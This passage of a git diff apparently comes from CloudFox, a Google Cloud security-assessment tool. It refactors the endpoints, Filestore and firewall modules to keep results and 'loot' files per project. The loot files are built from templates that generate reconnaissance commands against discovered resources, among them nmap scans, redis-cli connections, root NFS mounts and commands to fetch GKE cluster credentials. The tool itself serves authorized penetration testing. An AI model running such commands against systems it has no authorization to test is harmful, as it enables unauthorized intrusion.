allEndpoints := m.getAllEndpoints() + if len(allEndpoints) == 0 { logger.InfoM("No endpoints found", "endpoints") return } @@ -137,7 +145,7 @@ func (m *EndpointsModule) Execute(ctx context.Context, logger internal.Logger) { // Count external vs internal externalCount := 0 internalCount := 0 - for _, ep := range m.Endpoints { + for _, ep := range allEndpoints { if ep.IsExternal { externalCount++ } else { @@ -146,7 +154,7 @@ func (m *EndpointsModule) Execute(ctx context.Context, logger internal.Logger) { } logger.SuccessM(fmt.Sprintf("Found %d endpoint(s) [%d external, %d internal]", - len(m.Endpoints), externalCount, internalCount), "endpoints") + len(allEndpoints), externalCount, internalCount), "endpoints") m.writeOutput(ctx, logger) } @@ -228,7 +236,7 @@ func (m *EndpointsModule) getStaticExternalIPs(ctx context.Context, svc *compute IsExternal: true, Security: security, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } return nil @@ -264,7 +272,7 @@ func (m *EndpointsModule) getStaticExternalIPs(ctx context.Context, svc *compute IsExternal: true, Security: security, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } return nil @@ -312,7 +320,7 @@ func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Servi IsExternal: true, Network: networkName, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } @@ -340,7 +348,7 @@ func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Servi IsExternal: false, Network: networkName, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -438,7 +446,7 @@ func (m *EndpointsModule) getLoadBalancers(ctx context.Context, svc *compute.Ser } else { ep.InternalIP = rule.IPAddress } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -475,7 +483,7 @@ func (m *EndpointsModule) getLoadBalancers(ctx context.Context, svc *compute.Ser IsExternal: true, Security: security, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } return nil @@ -506,7 +514,7 @@ func (m *EndpointsModule) getVPNGateways(ctx context.Context, svc *compute.Servi IsExternal: true, Network: extractResourceName(gw.Network), } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -535,7 +543,7 @@ func (m *EndpointsModule) getVPNGateways(ctx context.Context, svc *compute.Servi IsExternal: true, Network: extractResourceName(gw.Network), } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -567,7 +575,7 @@ func (m *EndpointsModule) getCloudNAT(ctx context.Context, svc *compute.Service, IsExternal: true, Network: extractResourceName(router.Network), } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -597,7 +605,7 @@ func (m *EndpointsModule) getPrivateServiceConnect(ctx context.Context, svc *com Region: extractRegionFromScope(region), IsExternal: false, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } return nil @@ -645,7 +653,7 @@ func (m *EndpointsModule) getCloudRunServices(ctx context.Context, projectID str ep.ServiceAccount = service.Spec.Template.Spec.ServiceAccountName } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -683,7 +691,7 @@ func (m *EndpointsModule) getCloudFunctions(ctx context.Context, projectID strin IsExternal: true, Security: security, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -727,7 +735,7 @@ func (m *EndpointsModule) getAppEngineServices(ctx context.Context, projectID st TLSEnabled: true, IsExternal: true, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } @@ -770,7 +778,7 @@ func (m *EndpointsModule) getGKEClusters(ctx context.Context, projectID string, } else { ep.InternalIP = cluster.Endpoint } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -821,7 +829,7 @@ func (m *EndpointsModule) getCloudSQLInstances(ctx context.Context, projectID st IsExternal: true, Security: security, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } else if instance.PrivateIP != "" { // Private IP only ep := Endpoint{ @@ -837,7 +845,7 @@ func (m *EndpointsModule) getCloudSQLInstances(ctx context.Context, projectID st TLSEnabled: instance.RequireSSL, IsExternal: false, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -880,7 +888,7 @@ func (m *EndpointsModule) getMemorystoreRedis(ctx context.Context, projectID str Network: extractResourceName(instance.AuthorizedNetwork), Security: security, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -921,7 +929,7 @@ func (m *EndpointsModule) getFilestoreInstances(ctx context.Context, projectID s Network: instance.Network, Security: security, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -966,7 +974,7 @@ func (m *EndpointsModule) getComposerEnvironments(ctx context.Context, projectID Network: extractResourceName(env.Network), Security: security, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -1002,7 +1010,7 @@ func (m *EndpointsModule) getDataprocClusters(ctx context.Context, projectID str Network: cluster.Network, Security: security, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } @@ -1043,7 +1051,7 @@ func (m *EndpointsModule) getNotebookInstances(ctx context.Context, projectID st Network: instance.Network, Security: security, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -1080,7 +1088,7 @@ func (m *EndpointsModule) getPubSubPushEndpoints(ctx context.Context, projectID TLSEnabled: strings.HasPrefix(sub.PushEndpoint, "https://"), IsExternal: true, } - m.addEndpoint(ep) + m.addEndpoint(projectID, ep) } } } @@ -1121,10 +1129,20 @@ func (m *EndpointsModule) analyzeFirewallRules(ctx context.Context, svc *compute } // addEndpoint adds an endpoint thread-safely -func (m *EndpointsModule) addEndpoint(ep Endpoint) { +func (m *EndpointsModule) addEndpoint(projectID string, ep Endpoint) { m.mu.Lock() - m.Endpoints = append(m.Endpoints, ep) - m.addEndpointToLoot(ep) + // Initialize loot for this project if needed + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["endpoints-commands"] = &internal.LootFile{ + Name: "endpoints-commands", + Contents: "# Endpoint Scan Commands\n" + + "# Generated by CloudFox\n" + + "# Use these commands for authorized penetration testing\n\n", + } + } + m.ProjectEndpoints[projectID] = append(m.ProjectEndpoints[projectID], ep) + m.addEndpointToLoot(projectID, ep) m.mu.Unlock() } @@ -1161,16 +1179,11 @@ func extractZoneFromScope(scope string) string { // ------------------------------ // Loot File Management // ------------------------------ -func (m *EndpointsModule) initializeLootFiles() { - m.LootMap["endpoints-commands"] = &internal.LootFile{ - Name: "endpoints-commands", - Contents: "# Endpoint Scan Commands\n" + - "# Generated by CloudFox\n" + - "# Use these commands for authorized penetration testing\n\n", +func (m *EndpointsModule) addEndpointToLoot(projectID string, ep Endpoint) { + lootFile := m.LootMap[projectID]["endpoints-commands"] + if lootFile == nil { + return } -} - -func (m *EndpointsModule) addEndpointToLoot(ep Endpoint) { // Determine best target for scanning target := ep.ExternalIP if target == "" { @@ -1188,7 +1201,7 @@ func (m *EndpointsModule) addEndpointToLoot(ep Endpoint) { exposure = "EXTERNAL" } - m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# [%s] %s: %s (%s)\n"+ "# Project: %s | Region: %s | Network: %s\n", exposure, ep.Type, ep.Name, ep.ResourceType, @@ -1196,17 +1209,17 @@ func (m *EndpointsModule) addEndpointToLoot(ep Endpoint) { ) if ep.Security != "" { - m.LootMap["endpoints-commands"].Contents += fmt.Sprintf("# Security: %s\n", ep.Security) + lootFile.Contents += fmt.Sprintf("# Security: %s\n", ep.Security) } // Generate appropriate commands based on type switch ep.Type { case "Cloud Run", "Cloud Function", "Composer Airflow", "App Engine", "Vertex AI Notebook": if ep.Hostname != "" { - m.LootMap["endpoints-commands"].Contents += fmt.Sprintf("curl -v https://%s\n\n", ep.Hostname) + lootFile.Contents += fmt.Sprintf("curl -v https://%s\n\n", ep.Hostname) } case "GKE API": - m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Get cluster credentials:\n"+ "gcloud container clusters get-credentials %s --region=%s --project=%s\n"+ "kubectl cluster-info\n\n", @@ -1218,35 +1231,35 @@ func (m *EndpointsModule) addEndpointToLoot(ep Endpoint) { } else if strings.Contains(ep.Port, "1433") { protocol = "sqlcmd" } - m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Connect to database:\n"+ "# %s -h %s -P %s -u USERNAME\n"+ "nmap -sV -Pn -p %s %s\n\n", protocol, target, ep.Port, ep.Port, target) case "Redis": - m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "redis-cli -h %s -p %s\n"+ "nmap -sV -Pn -p %s %s\n\n", target, ep.Port, ep.Port, target) case "Filestore NFS": - m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "showmount -e %s\n"+ "sudo mount -t nfs %s:/ /mnt/\n\n", target, target) case "Dataproc Master": - m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# SSH to master node:\n"+ "gcloud compute ssh %s --project=%s --zone=\n"+ "# Web UIs: YARN (8088), HDFS (9870), Spark (8080)\n\n", strings.TrimSuffix(ep.Name, "-master"), ep.ProjectID) case "VPN Gateway", "HA VPN Gateway": - m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# VPN Gateway IP: %s\n"+ "# Ports: 500/UDP (IKE), 4500/UDP (NAT-T), ESP\n"+ "nmap -sU -Pn -p 500,4500 %s\n\n", target, target) case "Pub/Sub Push": - m.LootMap["endpoints-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Push endpoint (receives messages from Pub/Sub):\n"+ "curl -v https://%s\n\n", ep.Hostname) @@ -1258,10 +1271,10 @@ func (m *EndpointsModule) addEndpointToLoot(ep Endpoint) { default: nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, target) } - m.LootMap["endpoints-commands"].Contents += nmapCmd + "\n\n" + lootFile.Contents += nmapCmd + "\n\n" if ep.TLSEnabled || ep.Port == "443" { - m.LootMap["endpoints-commands"].Contents += fmt.Sprintf("curl -vk https://%s/\n\n", target) + lootFile.Contents += fmt.Sprintf("curl -vk https://%s/\n\n", target) } } } @@ -1270,7 +1283,15 @@ func (m *EndpointsModule) addEndpointToLoot(ep Endpoint) { // Output Generation // ------------------------------ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *EndpointsModule) getHeader() []string { + return []string{ "Project ID", "Project Name", "Name", @@ -1286,9 +1307,11 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge "Security", "Status", } +} +func (m *EndpointsModule) endpointsToTableBody(endpoints []Endpoint) [][]string { var body [][]string - for _, ep := range m.Endpoints { + for _, ep := range endpoints { exposure := "Internal" if ep.IsExternal { exposure = "External" @@ -1341,22 +1364,78 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge status, }) } + return body +} + +func (m *EndpointsModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if endpoints, ok := m.ProjectEndpoints[projectID]; ok && len(endpoints) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "endpoints", + Header: m.getHeader(), + Body: m.endpointsToTableBody(endpoints), + }) + } + + return tableFiles +} + +func (m *EndpointsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectEndpoints { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = EndpointsOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), "endpoints") + } +} + +func (m *EndpointsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allEndpoints := m.getAllEndpoints() + + var tables []internal.TableFile + + if len(allEndpoints) > 0 { + tables = append(tables, internal.TableFile{ + Name: "endpoints", + Header: m.getHeader(), + Body: m.endpointsToTableBody(allEndpoints), + }) + } // Collect loot files var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } } } output := EndpointsOutput{ - Table: []internal.TableFile{{ - Name: "endpoints", - Header: header, - Body: body, - }}, - Loot: lootFiles, + Table: tables, + Loot: lootFiles, } scopeNames := make([]string, len(m.ProjectIDs)) diff --git a/gcp/commands/filestore.go b/gcp/commands/filestore.go index 724952da..231d9900 100644 --- a/gcp/commands/filestore.go +++ b/gcp/commands/filestore.go @@ -23,9 +23,9 @@ var GCPFilestoreCommand = &cobra.Command{ type FilestoreModule struct { gcpinternal.BaseGCPModule - Instances []filestoreservice.FilestoreInstanceInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectInstances map[string][]filestoreservice.FilestoreInstanceInfo // projectID -> instances + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } type FilestoreOutput struct { @@ -43,27 +43,46 @@ func runGCPFilestoreCommand(cmd *cobra.Command, args []string) { } module := &FilestoreModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Instances: []filestoreservice.FilestoreInstanceInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]filestoreservice.FilestoreInstanceInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } +func (m *FilestoreModule) getAllInstances() []filestoreservice.FilestoreInstanceInfo { + var all []filestoreservice.FilestoreInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + func (m *FilestoreModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FILESTORE_MODULE_NAME, m.processProject) - if len(m.Instances) == 0 { + allInstances := m.getAllInstances() + if len(allInstances) == 0 { logger.InfoM("No Filestore instances found", globals.GCP_FILESTORE_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d Filestore instance(s)", len(m.Instances)), globals.GCP_FILESTORE_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d Filestore instance(s)", len(allInstances)), globals.GCP_FILESTORE_MODULE_NAME) m.writeOutput(ctx, logger) } func (m *FilestoreModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["filestore-commands"] = &internal.LootFile{ + Name: "filestore-commands", + Contents: "# Filestore Commands\n# Generated by CloudFox\n\n", + } + } + m.mu.Unlock() + svc := filestoreservice.New() instances, err := svc.ListInstances(projectID) if err != nil { @@ -74,28 +93,25 @@ func (m *FilestoreModule) processProject(ctx context.Context, projectID string, } m.mu.Lock() - m.Instances = append(m.Instances, instances...) + m.ProjectInstances[projectID] = instances for _, instance := range instances { - m.addToLoot(instance) + m.addToLoot(projectID, instance) } m.mu.Unlock() } -func (m *FilestoreModule) initializeLootFiles() { - m.LootMap["filestore-commands"] = &internal.LootFile{ - Name: "filestore-commands", - Contents: "# Filestore Commands\n# Generated by CloudFox\n\n", +func (m *FilestoreModule) addToLoot(projectID string, instance filestoreservice.FilestoreInstanceInfo) { + lootFile := m.LootMap[projectID]["filestore-commands"] + if lootFile == nil { + return } -} - -func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceInfo) { // Determine protocol display name protocol := instance.Protocol if protocol == "" { protocol = "NFS_V3" // Default } - m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# Instance: %s\n"+ "# ==========================================\n"+ @@ -115,7 +131,7 @@ func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceI ) // gcloud describe command - m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Describe instance:\n"+ "gcloud filestore instances describe %s --location=%s --project=%s\n\n", instance.Name, instance.Location, instance.ProjectID, @@ -124,7 +140,7 @@ func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceI // Mount commands for each share if len(instance.Shares) > 0 && len(instance.IPAddresses) > 0 { for _, share := range instance.Shares { - m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ------------------------------------------\n"+ "# Share: %s (%d GB)\n"+ "# ------------------------------------------\n", @@ -133,13 +149,13 @@ func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceI // Show NFS export options if present if len(share.NfsExportOptions) > 0 { - m.LootMap["filestore-commands"].Contents += "# NFS Export Options:\n" + lootFile.Contents += "# NFS Export Options:\n" for _, opt := range share.NfsExportOptions { ipRanges := strings.Join(opt.IPRanges, ", ") if ipRanges == "" { ipRanges = "all" } - m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# IP Ranges: %s\n"+ "# Access: %s\n"+ "# Squash: %s\n", @@ -148,20 +164,20 @@ func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceI opt.SquashMode, ) if opt.SquashMode == "NO_ROOT_SQUASH" { - m.LootMap["filestore-commands"].Contents += "# [!] NO_ROOT_SQUASH - root access preserved!\n" + lootFile.Contents += "# [!] NO_ROOT_SQUASH - root access preserved!\n" } } - m.LootMap["filestore-commands"].Contents += "\n" + lootFile.Contents += "\n" } // Generate mount commands based on protocol for _, ip := range instance.IPAddresses { - m.LootMap["filestore-commands"].Contents += "# Mount commands (run as root):\n" + lootFile.Contents += "# Mount commands (run as root):\n" switch protocol { case "NFS_V4_1": // NFSv4.1 mount command - m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# NFSv4.1 mount:\n"+ "sudo mkdir -p /mnt/%s\n"+ "sudo mount -t nfs -o vers=4.1 %s:/%s /mnt/%s\n"+ @@ -173,7 +189,7 @@ func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceI ) default: // NFS_V3 or empty // NFSv3 mount command - m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# NFSv3 mount:\n"+ "sudo mkdir -p /mnt/%s\n"+ "sudo mount -t nfs -o vers=3 %s:/%s /mnt/%s\n\n", @@ -183,7 +199,7 @@ func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceI } // List contents after mounting - m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# After mounting, list contents:\n"+ "ls -la /mnt/%s\n"+ "# Check disk usage:\n"+ @@ -192,7 +208,7 @@ func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceI ) // Unmount command - m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Unmount when done:\n"+ "sudo umount /mnt/%s\n\n", share.Name, @@ -203,7 +219,15 @@ func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceI } func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *FilestoreModule) getHeader() []string { + return []string{ "Project Name", "Project ID", "Name", @@ -217,9 +241,11 @@ func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logge "Security", "State", } +} +func (m *FilestoreModule) instancesToTableBody(instances []filestoreservice.FilestoreInstanceInfo) [][]string { var body [][]string - for _, instance := range m.Instances { + for _, instance := range instances { var shareNames []string var accessModes []string hasNoRootSquash := false @@ -291,16 +317,76 @@ func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logge instance.State, }) } + return body +} + +func (m *FilestoreModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if instances, ok := m.ProjectInstances[projectID]; ok && len(instances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "filestore", + Header: m.getHeader(), + Body: m.instancesToTableBody(instances), + }) + } + + return tableFiles +} + +func (m *FilestoreModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectInstances { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = FilestoreOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_FILESTORE_MODULE_NAME) + } +} + +func (m *FilestoreModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + + var tables []internal.TableFile + + if len(allInstances) > 0 { + tables = append(tables, internal.TableFile{ + Name: "filestore", + Header: m.getHeader(), + Body: m.instancesToTableBody(allInstances), + }) + } var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } } output := FilestoreOutput{ - Table: []internal.TableFile{{Name: "filestore", Header: header, Body: body}}, + Table: tables, Loot: lootFiles, } diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go index eb9d1acd..83304aff 100644 --- a/gcp/commands/firewall.go +++ b/gcp/commands/firewall.go @@ -48,11 +48,12 @@ Attack Surface: type FirewallModule struct { gcpinternal.BaseGCPModule - Networks []NetworkService.VPCInfo - Subnets []NetworkService.SubnetInfo - FirewallRules []NetworkService.FirewallRuleInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + // Per-project data for hierarchical output + ProjectNetworks map[string][]NetworkService.VPCInfo + ProjectSubnets map[string][]NetworkService.SubnetInfo + ProjectFirewallRules map[string][]NetworkService.FirewallRuleInfo + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex } // ------------------------------ @@ -76,14 +77,13 @@ func runGCPFirewallCommand(cmd *cobra.Command, args []string) { } module := &FirewallModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Networks: []NetworkService.VPCInfo{}, - Subnets: []NetworkService.SubnetInfo{}, - FirewallRules: []NetworkService.FirewallRuleInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectNetworks: make(map[string][]NetworkService.VPCInfo), + ProjectSubnets: make(map[string][]NetworkService.SubnetInfo), + ProjectFirewallRules: make(map[string][]NetworkService.FirewallRuleInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -93,26 +93,31 @@ func runGCPFirewallCommand(cmd *cobra.Command, args []string) { func (m *FirewallModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FIREWALL_MODULE_NAME, m.processProject) - if len(m.FirewallRules) == 0 && len(m.Networks) == 0 { + // Get all data for stats + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allRules := m.getAllFirewallRules() + + if len(allRules) == 0 && len(allNetworks) == 0 { logger.InfoM("No networks or firewall rules found", globals.GCP_FIREWALL_MODULE_NAME) return } // Count public ingress rules and peerings publicIngressCount := 0 - for _, rule := range m.FirewallRules { + for _, rule := range allRules { if rule.IsPublicIngress { publicIngressCount++ } } peeringCount := 0 - for _, network := range m.Networks { + for _, network := range allNetworks { peeringCount += len(network.Peerings) } msg := fmt.Sprintf("Found %d network(s), %d subnet(s), %d firewall rule(s)", - len(m.Networks), len(m.Subnets), len(m.FirewallRules)) + len(allNetworks), len(allSubnets), len(allRules)) if publicIngressCount > 0 { msg += fmt.Sprintf(" [%d public ingress]", publicIngressCount) } @@ -124,6 +129,33 @@ func (m *FirewallModule) Execute(ctx context.Context, logger internal.Logger) { m.writeOutput(ctx, logger) } +// getAllNetworks returns all networks from all projects +func (m *FirewallModule) getAllNetworks() []NetworkService.VPCInfo { + var all []NetworkService.VPCInfo + for _, networks := range m.ProjectNetworks { + all = append(all, networks...) + } + return all +} + +// getAllSubnets returns all subnets from all projects +func (m *FirewallModule) getAllSubnets() []NetworkService.SubnetInfo { + var all []NetworkService.SubnetInfo + for _, subnets := range m.ProjectSubnets { + all = append(all, subnets...) + } + return all +} + +// getAllFirewallRules returns all firewall rules from all projects +func (m *FirewallModule) getAllFirewallRules() []NetworkService.FirewallRuleInfo { + var all []NetworkService.FirewallRuleInfo + for _, rules := range m.ProjectFirewallRules { + all = append(all, rules...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -134,48 +166,60 @@ func (m *FirewallModule) processProject(ctx context.Context, projectID string, l ns := NetworkService.New() + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["firewall-commands"] = &internal.LootFile{ + Name: "firewall-commands", + Contents: "# Firewall Commands\n# Generated by CloudFox\n\n", + } + } + m.mu.Unlock() + + var networks []NetworkService.VPCInfo + var subnets []NetworkService.SubnetInfo + var rules []NetworkService.FirewallRuleInfo + // Get networks - networks, err := ns.Networks(projectID) + var err error + networks, err = ns.Networks(projectID) if err != nil { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, fmt.Sprintf("Could not enumerate networks in project %s", projectID)) - } else { - m.mu.Lock() - m.Networks = append(m.Networks, networks...) - for _, network := range networks { - m.addNetworkToLoot(network) - } - m.mu.Unlock() } // Get subnets - subnets, err := ns.Subnets(projectID) + subnets, err = ns.Subnets(projectID) if err != nil { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, fmt.Sprintf("Could not enumerate subnets in project %s", projectID)) - } else { - m.mu.Lock() - m.Subnets = append(m.Subnets, subnets...) - m.mu.Unlock() } // Get firewall rules - rules, err := ns.FirewallRulesEnhanced(projectID) + rules, err = ns.FirewallRulesEnhanced(projectID) if err != nil { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, fmt.Sprintf("Could not enumerate firewall rules in project %s", projectID)) - } else { - m.mu.Lock() - m.FirewallRules = append(m.FirewallRules, rules...) - for _, rule := range rules { - m.addFirewallRuleToLoot(rule) - } - m.mu.Unlock() } + // Thread-safe store per-project + m.mu.Lock() + m.ProjectNetworks[projectID] = networks + m.ProjectSubnets[projectID] = subnets + m.ProjectFirewallRules[projectID] = rules + + for _, network := range networks { + m.addNetworkToLoot(projectID, network) + } + for _, rule := range rules { + m.addFirewallRuleToLoot(projectID, rule) + } + m.mu.Unlock() + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Found %d network(s), %d subnet(s), %d rule(s) in project %s", len(networks), len(subnets), len(rules), projectID), globals.GCP_FIREWALL_MODULE_NAME) @@ -185,15 +229,13 @@ func (m *FirewallModule) processProject(ctx context.Context, projectID string, l // ------------------------------ // Loot File Management // ------------------------------ -func (m *FirewallModule) initializeLootFiles() { - m.LootMap["firewall-commands"] = &internal.LootFile{ - Name: "firewall-commands", - Contents: "# Firewall Commands\n# Generated by CloudFox\n\n", +func (m *FirewallModule) addNetworkToLoot(projectID string, network NetworkService.VPCInfo) { + lootFile := m.LootMap[projectID]["firewall-commands"] + if lootFile == nil { + return } -} -func (m *FirewallModule) addNetworkToLoot(network NetworkService.VPCInfo) { - m.LootMap["firewall-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Network: %s\n"+ "# Project: %s\n"+ "gcloud compute networks describe %s --project=%s\n"+ @@ -206,8 +248,13 @@ func (m *FirewallModule) addNetworkToLoot(network NetworkService.VPCInfo) { ) } -func (m *FirewallModule) addFirewallRuleToLoot(rule NetworkService.FirewallRuleInfo) { - m.LootMap["firewall-commands"].Contents += fmt.Sprintf( +func (m *FirewallModule) 